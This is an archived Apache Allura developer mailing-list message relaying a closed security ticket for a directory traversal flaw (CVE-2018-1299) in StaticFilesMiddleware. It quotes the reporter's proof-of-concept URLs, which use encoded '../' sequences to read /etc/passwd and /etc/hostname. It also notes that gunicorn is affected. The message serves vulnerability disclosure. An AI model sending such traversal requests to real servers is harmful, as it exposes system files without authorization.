allura-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Dave Brondsema" <d...@brondsema.net>
Subject [allura:tickets] #8180 StaticFilesMiddleware allows directory traversal
Date Tue, 06 Feb 2018 17:55:40 GMT
- **private**: Yes --> No



---

** [tickets:#8180] StaticFilesMiddleware allows directory traversal**

**Status:** closed
**Milestone:** v1.8.0
**Labels:** security 
**Created:** Mon Jan 29, 2018 06:28 PM UTC by Dave Brondsema
**Last Updated:** Mon Feb 05, 2018 04:59 PM UTC
**Owner:** Dave Brondsema


>From reporter:

> The vulnerability allows unauthenticated attackers to retrieve
> arbitrary files from the Allura web server.
> 
> PoC URsL:
> http://<allura-web-server>/nf/1276635823/_static_/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
> http://<allura-web-server>/nf/1276635823/_static_/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname

-----

The %2F does't seem necessary in my testing.  The paster, nginx and apache/mod_wsgi servers
seem to protect against this, but gunicorn (which we recommend for production) permits the
vulnerability.

This has been assigned CVE-2018-1299



---

Sent from forge-allura.apache.org because dev@allura.apache.org is subscribed to https://forge-allura.apache.org/p/allura/tickets/

To unsubscribe from further messages, a project admin can change settings at https://forge-allura.apache.org/p/allura/admin/tickets/options.
 Or, if this is a mailing list, you can unsubscribe from the mailing list.
Mime
  • Unnamed multipart/related (inline, None, 0 bytes)
View raw message